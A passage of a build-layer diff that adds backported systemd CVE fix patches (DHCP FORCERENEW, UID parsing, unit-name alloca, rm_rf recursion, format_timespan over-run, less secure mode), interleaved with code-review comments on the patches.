+@@ -1392,9 +1392,17 @@ static int client_handle_forcerenew(sd_dhcp_client *client, DHCPMessage *force,
+ if (r != DHCP_FORCERENEW)
+ return -ENOMSG;
+
++#if 0
+ log_dhcp_client(client, "FORCERENEW");
+
+ return 0;
++#else
++ /* FIXME: Ignore FORCERENEW requests until we implement RFC3118 (Authentication for DHCP
++ * Messages) and/or RFC6704 (Forcerenew Nonce Authentication), as unauthenticated FORCERENEW
++ * requests causes a security issue (TALOS-2020-1142, CVE-2020-13529). */
++ log_dhcp_client(client, "Received FORCERENEW, ignoring.");
++ return -ENOMSG;
++#endif
+ }
+
+ static bool lease_equal(const sd_dhcp_lease *a, const sd_dhcp_lease *b) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch b/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
deleted file mode 100644
index 7b5e3e7f7a..0000000000
--- a/meta/recipes-core/systemd/systemd/CVE-2020-13776.patch
+++ /dev/null
@@ -1,96 +0,0 @@
-From 156a5fd297b61bce31630d7a52c15614bf784843 Mon Sep 17 00:00:00 2001
-From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
-Date: Sun, 31 May 2020 18:21:09 +0200
-Subject: [PATCH 1/1] basic/user-util: always use base 10 for user/group
- numbers
-
-We would parse numbers with base prefixes as user identifiers. For example,
-"0x2b3bfa0" would be interpreted as UID==45334432 and "01750" would be
-interpreted as UID==1000. This parsing was used also in cases where either a
-user/group name or number may be specified. This means that names like
-0x2b3bfa0 would be ambiguous: they are a valid user name according to our
-documented relaxed rules, but they would also be parsed as numeric uids.
-
-This behaviour is definitely not expected by users, since tools generally only
-accept decimal numbers (e.g. id, getent passwd), while other tools only accept
-user names and thus will interpret such strings as user names without even
-attempting to convert them to numbers (su, ssh). So let's follow suit and only
-accept numbers in decimal notation. Effectively this means that we will reject
-such strings as a username/uid/groupname/gid where strict mode is used, and try
-to look up a user/group with such a name in relaxed mode.
-
-Since the function changed is fairly low-level and fairly widely used, this
-affects multiple tools: loginctl show-user/enable-linger/disable-linger foo',
-the third argument in sysusers.d, fourth and fifth arguments in tmpfiles.d,
-etc.
-
-Fixes #15985.
----
- src/basic/user-util.c | 2 +-
- src/test/test-user-util.c | 10 ++++++++++
- 2 files changed, 11 insertions(+), 1 deletion(-)
-
---- end of commit 156a5fd297b61bce31630d7a52c15614bf784843 ---
-
-
-Add definition of safe_atou32_full() from commit b934ac3d6e7dcad114776ef30ee9098693e7ab7e
-
-CVE: CVE-2020-13776
-
-Upstream-Status: Backport [https://github.com/systemd/systemd.git]
-
-Signed-off-by: Joe Slater <joe.slater@windriver.com>
-
-
-
---- git.orig/src/basic/user-util.c
-+++ git/src/basic/user-util.c
-@@ -49,7 +49,7 @@ int parse_uid(const char *s, uid_t *ret)
- assert(s);
-
- assert_cc(sizeof(uid_t) == sizeof(uint32_t));
-- r = safe_atou32(s, &uid);
-+ r = safe_atou32_full(s, 10, &uid);
- if (r < 0)
- return r;
-
---- git.orig/src/test/test-user-util.c
-+++ git/src/test/test-user-util.c
-@@ -48,9 +48,19 @@ static void test_parse_uid(void) {
-
- r = parse_uid("65535", &uid);
- assert_se(r == -ENXIO);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("0x1234", &uid);
-+ assert_se(r == -EINVAL);
-+ assert_se(uid == 100);
-+
-+ r = parse_uid("01234", &uid);
-+ assert_se(r == 0);
-+ assert_se(uid == 1234);
-
- r = parse_uid("asdsdas", &uid);
- assert_se(r == -EINVAL);
-+ assert_se(uid == 1234);
- }
-
- static void test_uid_ptr(void) {
---- git.orig/src/basic/parse-util.h
-+++ git/src/basic/parse-util.h
-@@ -45,9 +45,13 @@ static inline int safe_atoux16(const cha
-
- int safe_atoi16(const char *s, int16_t *ret);
-
--static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+static inline int safe_atou32_full(const char *s, unsigned base, uint32_t *ret_u) {
- assert_cc(sizeof(uint32_t) == sizeof(unsigned));
-- return safe_atou(s, (unsigned*) ret_u);
-+ return safe_atou_full(s, base, (unsigned*) ret_u);
-+}
-+
-+static inline int safe_atou32(const char *s, uint32_t *ret_u) {
-+ return safe_atou32_full(s, 0, (unsigned*) ret_u);
- }
-
- static inline int safe_atoi32(const char *s, int32_t *ret_i) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
new file mode 100644
index 0000000000..e92d721d3d
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-33910.patch
@@ -0,0 +1,67 @@
+Backport of:
+
+From 441e0115646d54f080e5c3bb0ba477c892861ab9 Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Wed, 23 Jun 2021 11:46:41 +0200
+Subject: [PATCH 1/2] basic/unit-name: do not use strdupa() on a path
+
+The path may have unbounded length, for example through a fuse mount.
+
+CVE-2021-33910: attacked controlled alloca() leads to crash in systemd and
+ultimately a kernel panic. Systemd parses the content of /proc/self/mountinfo
+and each mountpoint is passed to mount_setup_unit(), which calls
+unit_name_path_escape() underneath. A local attacker who is able to mount a
+filesystem with a very long path can crash systemd and the whole system.
+
+https://bugzilla.redhat.com/show_bug.cgi?id=1970887
+
+The resulting string length is bounded by UNIT_NAME_MAX, which is 256. But we
+can't easily check the length after simplification before doing the
+simplification, which in turns uses a copy of the string we can write to.
+So we can't reject paths that are too long before doing the duplication.
+Hence the most obvious solution is to switch back to strdup(), as before
+7410616cd9dbbec97cf98d75324da5cda2b2f7a2.
+
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/20256/commits/441e0115646d54f080e5c3bb0ba477c892861ab9]
+CVE: CVE-2021-33910
+
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ src/basic/unit-name.c | 13 +++++--------
+ 1 file changed, 5 insertions(+), 8 deletions(-)
+
+--- a/src/basic/unit-name.c
++++ b/src/basic/unit-name.c
+@@ -369,12 +369,13 @@ int unit_name_unescape(const char *f, char **ret) {
+ }
+
+ int unit_name_path_escape(const char *f, char **ret) {
+- char *p, *s;
++ _cleanup_free_ char *p = NULL;
++ char *s;
+
+ assert(f);
+ assert(ret);
+
+- p = strdupa(f);
++ p = strdup(f);
+ if (!p)
+ return -ENOMEM;
+
+@@ -386,13 +387,9 @@ int unit_name_path_escape(const char *f, char **ret) {
+ if (!path_is_normalized(p))
+ return -EINVAL;
+
+- /* Truncate trailing slashes */
++ /* Truncate trailing slashes and skip leading slashes */
+ delete_trailing_chars(p, "/");
+-
+- /* Truncate leading slashes */
+- p = skip_leading_chars(p, "/");
+-
+- s = unit_name_escape(p);
++ s = unit_name_escape(skip_leading_chars(p, "/"));
+ }
+ if (!s)
+ return -ENOMEM;
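Review bot: Nothing in `unit_name_path_escape()` records that `p`, now declared `_cleanup_free_`, must keep pointing at the start of the `strdup()` allocation. That is why the second hunk passes `skip_leading_chars(p, "/")` straight to `unit_name_escape()` instead of assigning it back to `p`; a later edit that restores the assignment would hand an interior pointer to `free()`. I would extend the comment to `/* Truncate trailing slashes and skip leading slashes; do not reassign p, it is freed on return */`. The function starts in the first hunk and continues past the end of the second.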
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
new file mode 100644
index 0000000000..341976822b
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-1.patch
@@ -0,0 +1,65 @@
+Backport of the following upstream commit:
+From fbb77e1e55866633c9f064e2b3bcf2b6402d962d Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 15:55:45 +0100
+Subject: [PATCH 1/3] shared/rm_rf: refactor rm_rf_children_inner() to shorten
+ code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 27 +++++++++------------------
+ 1 file changed, 9 insertions(+), 18 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -34,7 +34,7 @@
+ const struct stat *root_dev) {
+
+ struct stat st;
+- int r;
++ int r, q = 0;
+
+ assert(fd >= 0);
+ assert(fname);
+@@ -50,7 +50,6 @@
+
+ if (is_dir) {
+ _cleanup_close_ int subdir_fd = -1;
+- int q;
+
+ /* if root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+@@ -86,23 +85,15 @@
+ * again for each directory */
+ q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
+
+- r = unlinkat(fd, fname, AT_REMOVEDIR);
+- if (r < 0)
+- return r;
+- if (q < 0)
+- return q;
+-
+- return 1;
+-
+- } else if (!(flags & REMOVE_ONLY_DIRECTORIES)) {
+- r = unlinkat(fd, fname, 0);
+- if (r < 0)
+- return r;
+-
+- return 1;
+- }
++ } else if (flags & REMOVE_ONLY_DIRECTORIES)
++ return 0;
+
+- return 0;
++ r = unlinkat(fd, fname, is_dir ? AT_REMOVEDIR : 0);
++ if (r < 0)
++ return r;
++ if (q < 0)
++ return q;
++ return 1;
+ }
+
+ int rm_rf_children(
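Review bot: The `Upstream-Status: Backport` line in this patch header points at a Debian packaging tarball on archive.ubuntu.com over plain `http://` rather than at the upstream commit named in the `From` line, and CVE-2021-3997-2.patch and CVE-2021-3997-3.patch do the same. A tarball URL cannot be compared line by line with this file and may stop resolving once the archive drops that package version, which makes the backport hard to audit later. Referencing the commit keeps the provenance checkable, e.g. `Upstream-Status: Backport [https://github.com/systemd/systemd/commit/fbb77e1e55866633c9f064e2b3bcf2b6402d962d]`, with a remark that the hunks were taken from the Ubuntu packaging if they differ from upstream.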
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
new file mode 100644
index 0000000000..066e10fbbc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-2.patch
@@ -0,0 +1,101 @@
+Backport of the following upstream commit:
+From bd0127daaaae009ade053718f7d2f297aee4acaf Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 23 Nov 2021 16:56:42 +0100
+Subject: [PATCH 2/3] shared/rm_rf: refactor rm_rf() to shorten code a bit
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 53 ++++++++++++++++++++--------------------------
+ 1 file changed, 23 insertions(+), 30 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -159,7 +159,7 @@
+ }
+
+ int rm_rf(const char *path, RemoveFlags flags) {
+- int fd, r;
++ int fd, r, q = 0;
+
+ assert(path);
+
+@@ -191,49 +191,47 @@
+ }
+
+ fd = open(path, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+- if (fd < 0) {
++ if (fd >= 0) {
++ /* We have a dir */
++ r = rm_rf_children(fd, flags, NULL);
++
++ if (FLAGS_SET(flags, REMOVE_ROOT)) {
++ q = rmdir(path);
++ if (q < 0)
++ q = -errno;
++ }
++ } else {
+ if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+ return 0;
+
+ if (!IN_SET(errno, ENOTDIR, ELOOP))
+ return -errno;
+
+- if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES))
++ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES) || !FLAGS_SET(flags, REMOVE_ROOT))
+ return 0;
+
+- if (FLAGS_SET(flags, REMOVE_ROOT)) {
+-
+- if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
+- struct statfs s;
+-
+- if (statfs(path, &s) < 0)
+- return -errno;
+- if (is_physical_fs(&s))
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove files from a disk file system under \"%s\", refusing.",
+- path);
+- }
+-
+- if (unlink(path) < 0) {
+- if (FLAGS_SET(flags, REMOVE_MISSING_OK) && errno == ENOENT)
+- return 0;
++ if (!FLAGS_SET(flags, REMOVE_PHYSICAL)) {
++ struct statfs s;
+
++ if (statfs(path, &s) < 0)
+ return -errno;
+- }
++ if (is_physical_fs(&s))
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove files from a disk file system under \"%s\", refusing.",
++ path);
+ }
+
+- return 0;
++ r = 0;
++ q = unlink(path);
++ if (q < 0)
++ q = -errno;
+ }
+
+- r = rm_rf_children(fd, flags, NULL);
+-
+- if (FLAGS_SET(flags, REMOVE_ROOT) &&
+- rmdir(path) < 0 &&
+- r >= 0 &&
+- (!FLAGS_SET(flags, REMOVE_MISSING_OK) || errno != ENOENT))
+- r = -errno;
+-
+- return r;
++ if (r < 0)
++ return r;
++ if (q < 0 && (q != -ENOENT || !FLAGS_SET(flags, REMOVE_MISSING_OK)))
++ return q;
++ return 0;
+ }
+
+ int rm_rf_child(int fd, const char *name, RemoveFlags flags) {
diff --git a/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
new file mode 100644
index 0000000000..c96b8d9a6e
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2021-3997-3.patch
@@ -0,0 +1,266 @@
+Backport of the following upstream commit:
+From bef8e8e577368697b2e6f85183b1dbc99e0e520f Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Zbigniew=20J=C4=99drzejewski-Szmek?= <zbyszek@in.waw.pl>
+Date: Tue, 30 Nov 2021 22:29:05 +0100
+Subject: [PATCH 3/3] shared/rm-rf: loop over nested directories instead of
+ instead of recursing
+
+To remove directory structures, we need to remove the innermost items first,
+and then recursively remove higher-level directories. We would recursively
+descend into directories and invoke rm_rf_children and rm_rm_children_inner.
+This is problematic when too many directories are nested.
+
+Instead, let's create a "TODO" queue. In the the queue, for each level we
+hold the DIR* object we were working on, and the name of the directory. This
+allows us to leave a partially-processed directory, and restart the removal
+loop one level down. When done with the inner directory, we use the name to
+unlinkat() it from the parent, and proceed with the removal of other items.
+
+Because the nesting is increased by one level, it is best to view this patch
+with -b/--ignore-space-change.
+
+This fixes CVE-2021-3997, https://bugzilla.redhat.com/show_bug.cgi?id=2024639.
+The issue was reported and patches reviewed by Qualys Team.
+Mauro Matteo Cascella and Riccardo Schirone from Red Hat handled the disclosure.
+
+CVE: CVE-2021-3997
+Upstream-Status: Backport [http://archive.ubuntu.com/ubuntu/pool/main/s/systemd/systemd_245.4-4ubuntu3.15.debian.tar.xz]
+Signed-off-by: Purushottam Choudhary <Purushottam.Choudhary@kpit.com>
+---
+ src/basic/rm-rf.c | 161 +++++++++++++++++++++++++++++++--------------
+ 1 file changed, 113 insertions(+), 48 deletions(-)
+
+--- a/src/basic/rm-rf.c
++++ b/src/basic/rm-rf.c
+@@ -26,12 +26,13 @@
+ return !is_temporary_fs(sfs) && !is_cgroup_fs(sfs);
+ }
+
+-static int rm_rf_children_inner(
++static int rm_rf_inner_child(
+ int fd,
+ const char *fname,
+ int is_dir,
+ RemoveFlags flags,
+- const struct stat *root_dev) {
++ const struct stat *root_dev,
++ bool allow_recursion) {
+
+ struct stat st;
+ int r, q = 0;
+@@ -49,9 +50,7 @@
+ }
+
+ if (is_dir) {
+- _cleanup_close_ int subdir_fd = -1;
+-
+- /* if root_dev is set, remove subdirectories only if device is same */
++ /* If root_dev is set, remove subdirectories only if device is same */
+ if (root_dev && st.st_dev != root_dev->st_dev)
+ return 0;
+
+@@ -63,7 +62,6 @@
+ return 0;
+
+ if ((flags & REMOVE_SUBVOLUME) && st.st_ino == 256) {
+-
+ /* This could be a subvolume, try to remove it */
+
+ r = btrfs_subvol_remove_fd(fd, fname, BTRFS_REMOVE_RECURSIVE|BTRFS_REMOVE_QUOTA);
+@@ -77,13 +75,16 @@
+ return 1;
+ }
+
+- subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (!allow_recursion)
++ return -EISDIR;
++
++ int subdir_fd = openat(fd, fname, O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
+ if (subdir_fd < 0)
+ return -errno;
+
+ /* We pass REMOVE_PHYSICAL here, to avoid doing the fstatfs() to check the file system type
+ * again for each directory */
+- q = rm_rf_children(TAKE_FD(subdir_fd), flags | REMOVE_PHYSICAL, root_dev);
++ q = rm_rf_children(subdir_fd, flags | REMOVE_PHYSICAL, root_dev);
+
+ } else if (flags & REMOVE_ONLY_DIRECTORIES)
+ return 0;
+@@ -96,64 +97,128 @@
+ return 1;
+ }
+
++typedef struct TodoEntry {
++ DIR *dir; /* A directory that we were operating on. */
++ char *dirname; /* The filename of that directory itself. */
++} TodoEntry;
++
++static void free_todo_entries(TodoEntry **todos) {
++ for (TodoEntry *x = *todos; x && x->dir; x++) {
++ closedir(x->dir);
++ free(x->dirname);
++ }
++
++ freep(todos);
++}
++
+ int rm_rf_children(
+ int fd,
+ RemoveFlags flags,
+ const struct stat *root_dev) {
+
+- _cleanup_closedir_ DIR *d = NULL;
+- struct dirent *de;
++ _cleanup_(free_todo_entries) TodoEntry *todos = NULL;
++ size_t n_todo = 0, allocated = 0;
++ _cleanup_free_ char *dirname = NULL; /* Set when we are recursing and want to delete ourselves */
+ int ret = 0, r;
+
+- assert(fd >= 0);
++ /* Return the first error we run into, but nevertheless try to go on.
++ * The passed fd is closed in all cases, including on failure. */
+
+- /* This returns the first error we run into, but nevertheless tries to go on. This closes the passed
+- * fd, in all cases, including on failure. */
++ for (;;) { /* This loop corresponds to the directory nesting level. */
++ _cleanup_closedir_ DIR *d = NULL;
++ struct dirent *de;
++
++ if (n_todo > 0) {
++ /* We know that we are in recursion here, because n_todo is set.
++ * We need to remove the inner directory we were operating on. */
++ assert(dirname);
++ r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);
++ if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ dirname = mfree(dirname);
++
++ /* And now let's back out one level up */
++ n_todo --;
++ d = TAKE_PTR(todos[n_todo].dir);
++ dirname = TAKE_PTR(todos[n_todo].dirname);
++
++ assert(d);
++ fd = dirfd(d); /* Retrieve the file descriptor from the DIR object */
++ assert(fd >= 0);
++ } else {
++ next_fd:
++ assert(fd >= 0);
++ d = fdopendir(fd);
++ if (!d) {
++ safe_close(fd);
++ return -errno;
++ }
++ fd = dirfd(d); /* We donated the fd to fdopendir(). Let's make sure we sure we have
++ * the right descriptor even if it were to internally invalidate the
++ * one we passed. */
++
++ if (!(flags & REMOVE_PHYSICAL)) {
++ struct statfs sfs;
++
++ if (fstatfs(fd, &sfs) < 0)
++ return -errno;
++
++ if (is_physical_fs(&sfs)) {
++ /* We refuse to clean physical file systems with this call, unless
++ * explicitly requested. This is extra paranoia just to be sure we
++ * never ever remove non-state data. */
++
++ _cleanup_free_ char *path = NULL;
++
++ (void) fd_get_path(fd, &path);
++ return log_error_errno(SYNTHETIC_ERRNO(EPERM),
++ "Attempted to remove disk file system under \"%s\", and we can't allow that.",
++ strna(path));
++ }
++ }
++ }
+
+- d = fdopendir(fd);
+- if (!d) {
+- safe_close(fd);
+- return -errno;
+- }
++ FOREACH_DIRENT_ALL(de, d, return -errno) {
++ int is_dir;
+
+- if (!(flags & REMOVE_PHYSICAL)) {
+- struct statfs sfs;
++ if (dot_or_dot_dot(de->d_name))
++ continue;
+
+- if (fstatfs(dirfd(d), &sfs) < 0)
+- return -errno;
+- }
++ is_dir = de->d_type == DT_UNKNOWN ? -1 : de->d_type == DT_DIR;
+
+- if (is_physical_fs(&sfs)) {
+- /* We refuse to clean physical file systems with this call, unless explicitly
+- * requested. This is extra paranoia just to be sure we never ever remove non-state
+- * data. */
+-
+- _cleanup_free_ char *path = NULL;
+-
+- (void) fd_get_path(fd, &path);
+- return log_error_errno(SYNTHETIC_ERRNO(EPERM),
+- "Attempted to remove disk file system under \"%s\", and we can't allow that.",
+- strna(path));
+- }
+- }
++ r = rm_rf_inner_child(fd, de->d_name, is_dir, flags, root_dev, false);
++ if (r == -EISDIR) {
++ /* Push the current working state onto the todo list */
+
+- FOREACH_DIRENT_ALL(de, d, return -errno) {
+- int is_dir;
++ if (!GREEDY_REALLOC0(todos, allocated, n_todo + 2))
++ return log_oom();
+
+- if (dot_or_dot_dot(de->d_name))
+- continue;
++ _cleanup_free_ char *newdirname = strdup(de->d_name);
++ if (!newdirname)
++ return log_oom();
+
+- is_dir =
+- de->d_type == DT_UNKNOWN ? -1 :
+- de->d_type == DT_DIR;
+-
+- r = rm_rf_children_inner(dirfd(d), de->d_name, is_dir, flags, root_dev);
+- if (r < 0 && r != -ENOENT && ret == 0)
+- ret = r;
+- }
++ int newfd = openat(fd, de->d_name,
++ O_RDONLY|O_NONBLOCK|O_DIRECTORY|O_CLOEXEC|O_NOFOLLOW|O_NOATIME);
++ if (newfd >= 0) {
++ todos[n_todo++] = (TodoEntry) { TAKE_PTR(d), TAKE_PTR(dirname) };
++ fd = newfd;
++ dirname = TAKE_PTR(newdirname);
++
++ goto next_fd;
+
+- if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(dirfd(d)) < 0 && ret >= 0)
+- ret = -errno;
++ } else if (errno != -ENOENT && ret == 0)
++ ret = -errno;
++
++ } else if (r < 0 && r != -ENOENT && ret == 0)
++ ret = r;
++ }
++
++ if (FLAGS_SET(flags, REMOVE_SYNCFS) && syncfs(fd) < 0 && ret >= 0)
++ ret = -errno;
++
++ if (n_todo == 0)
++ break;
++ }
+
+ return ret;
+ }
+@@ -250,5 +315,5 @@
+ if (FLAGS_SET(flags, REMOVE_ONLY_DIRECTORIES|REMOVE_SUBVOLUME))
+ return -EINVAL;
+
+- return rm_rf_children_inner(fd, name, -1, flags, NULL);
++ return rm_rf_inner_child(fd, name, -1, flags, NULL, true);
+ }
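Review bot: In the rewritten rm_rf_children() loop, two of the new error checks compare values that can never match, so ENOENT is not ignored as intended and the wrong error code is recorded. `r = unlinkat(dirfd(todos[n_todo-1].dir), dirname, AT_REMOVEDIR);` stores the raw return value (-1 on failure), so `r != -ENOENT` is always true and `ret` becomes -1 rather than the real errno. Capturing the errno first fixes this: `r = unlinkat(...) < 0 ? -errno : 0;`. Likewise, after the failed `openat()` the test `errno != -ENOENT` compares a positive errno with a negative constant, and should read `errno != ENOENT`. As written, a directory removed concurrently by another process turns a successful cleanup into a reported failure, which matters for callers that act on the return value.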
diff --git a/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
new file mode 100644
index 0000000000..f9c6704cfc
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2022-3821.patch
@@ -0,0 +1,47 @@
+From 9102c625a673a3246d7e73d8737f3494446bad4e Mon Sep 17 00:00:00 2001
+From: Yu Watanabe <watanabe.yu+github@gmail.com>
+Date: Thu, 7 Jul 2022 18:27:02 +0900
+Subject: [PATCH] time-util: fix buffer-over-run
+
+Fixes #23928.
+
+CVE: CVE-2022-3821
+Upstream-Status: Backport [https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e.patch]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+Comment: Both the hunks refreshed to backport
+
+---
+ src/basic/time-util.c | 2 +-
+ src/test/test-time-util.c | 5 +++++
+ 2 files changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/src/basic/time-util.c b/src/basic/time-util.c
+index abbc4ad5cd70..26d59de12348 100644
+--- a/src/basic/time-util.c
++++ b/src/basic/time-util.c
+@@ -514,7 +514,7 @@ char *format_timespan(char *buf, size_t
+ t = b;
+ }
+
+- n = MIN((size_t) k, l);
++ n = MIN((size_t) k, l-1);
+
+ l -= n;
+ p += n;
+diff --git a/src/test/test-time-util.c b/src/test/test-time-util.c
+index e8e4e2a67bb1..58c5fa9be40c 100644
+--- a/src/test/test-time-util.c
++++ b/src/test/test-time-util.c
+@@ -501,6 +501,12 @@ int main(int argc, char *argv[]) {
+ test_format_timespan(1);
+ test_format_timespan(USEC_PER_MSEC);
+ test_format_timespan(USEC_PER_SEC);
++
++ /* See issue #23928. */
++ _cleanup_free_ char *buf;
++ assert_se(buf = new(char, 5));
++ assert_se(buf == format_timespan(buf, 5, 100005, 1000));
++
+ test_timezone_is_valid();
+ test_get_timezones();
+ test_usec_add();
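Review bot: The regression test added to main() in test-time-util.c only asserts that format_timespan() returns `buf`, so a one-byte overrun of the 5-byte allocation is caught only when the test runs under a sanitizer or valgrind. An explicit bound check after the call, for example `assert_se(strlen(buf) < 5);`, would make the test fail on a plain build as well. Separately, `_cleanup_free_ char *buf;` is declared without an initializer; `_cleanup_free_ char *buf = NULL;` keeps the cleanup handler safe if an early exit is ever added before the allocation. main() continues outside this hunk.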
diff --git a/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
new file mode 100644
index 0000000000..39f9480cf8
--- /dev/null
+++ b/meta/recipes-core/systemd/systemd/CVE-2023-26604-1.patch
@@ -0,0 +1,115 @@
+From 612ebf6c913dd0e4197c44909cb3157f5c51a2f0 Mon Sep 17 00:00:00 2001
+From: Lennart Poettering <lennart@poettering.net>
+Date: Mon, 31 Aug 2020 19:37:13 +0200
+Subject: [PATCH] pager: set $LESSSECURE whenver we invoke a pager
+
+Some extra safety when invoked via "sudo". With this we address a
+genuine design flaw of sudo, and we shouldn't need to deal with this.
+But it's still a good idea to disable this surface given how exotic it
+is.
+
+Prompted by #5666
+
+CVE: CVE-2023-26604
+Upstream-Status: Backport [https://github.com/systemd/systemd/pull/17270/commits/612ebf6c913dd0e4197c44909cb3157f5c51a2f0]
+Comments: Hunk not refreshed
+Signed-off-by: rajmohan r <rajmohan.r@kpit.com>
+---
+ man/less-variables.xml | 9 +++++++++
+ man/systemctl.xml | 1 +
+ man/systemd.xml | 1 +
+ src/shared/pager.c | 23 +++++++++++++++++++++--
+ 4 files changed, 32 insertions(+), 2 deletions(-)
+
+diff --git a/man/less-variables.xml b/man/less-variables.xml
+index 08e513c99f8e..c52511ca8e18 100644
+--- a/man/less-variables.xml
++++ b/man/less-variables.xml
+@@ -64,6 +64,15 @@
+ the invoking terminal is determined to be UTF-8 compatible).</para></listitem>
+ </varlistentry>
+
++ <varlistentry id='lesssecure'>
++ <term><varname>$SYSTEMD_LESSSECURE</varname></term>
++
++ <listitem><para>Takes a boolean argument. Overrides the <varname>$LESSSECURE</varname> environment
++ variable when invoking the pager, which controls the "secure" mode of less (which disables commands
++ such as <literal>|</literal> which allow to easily shell out to external command lines). By default
++ less secure mode is enabled, with this setting it may be disabled.</para></listitem>
++ </varlistentry>
++
+ <varlistentry id='colors'>
+ <term><varname>$SYSTEMD_COLORS</varname></term>
+
+diff --git a/man/systemctl.xml b/man/systemctl.xml
+index 1c5502883700..a3f0c3041a57 100644
+--- a/man/systemctl.xml
++++ b/man/systemctl.xml
+@@ -2240,6 +2240,7 @@ Jan 12 10:46:45 example.com bluetoothd[8900]: gatt-time-server: Input/output err
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+ </refsect1>
+diff --git a/man/systemd.xml b/man/systemd.xml
+index a9040545c2ab..c92cfef77689 100644
+--- a/man/systemd.xml
++++ b/man/systemd.xml
+@@ -692,6 +692,7 @@
+ <xi:include href="less-variables.xml" xpointer="pager"/>
+ <xi:include href="less-variables.xml" xpointer="less"/>
+ <xi:include href="less-variables.xml" xpointer="lesscharset"/>
++ <xi:include href="less-variables.xml" xpointer="lesssecure"/>
+ <xi:include href="less-variables.xml" xpointer="colors"/>
+ <xi:include href="less-variables.xml" xpointer="urlify"/>
+
+diff --git a/src/shared/pager.c b/src/shared/pager.c
+index e03be6d23b2d..9c21881241f5 100644
+--- a/src/shared/pager.c
++++ b/src/shared/pager.c
+@@ -9,6 +9,7 @@
+ #include <unistd.h>
+
+ #include "copy.h"
++#include "env-util.h"
+ #include "fd-util.h"
+ #include "fileio.h"
+ #include "io-util.h"
+@@ -152,8 +153,7 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
+- /* Initialize a good charset for less. This is
+- * particularly important if we output UTF-8
++ /* Initialize a good charset for less. This is particularly important if we output UTF-8
+ * characters. */
+ less_charset = getenv("SYSTEMD_LESSCHARSET");
+ if (!less_charset && is_locale_utf8())
+@@ -164,6 +164,25 @@ int pager_open(PagerFlags flags) {
+ _exit(EXIT_FAILURE);
+ }
+
++ /* People might invoke us from sudo, don't needlessly allow less to be a way to shell out
++ * privileged stuff. */
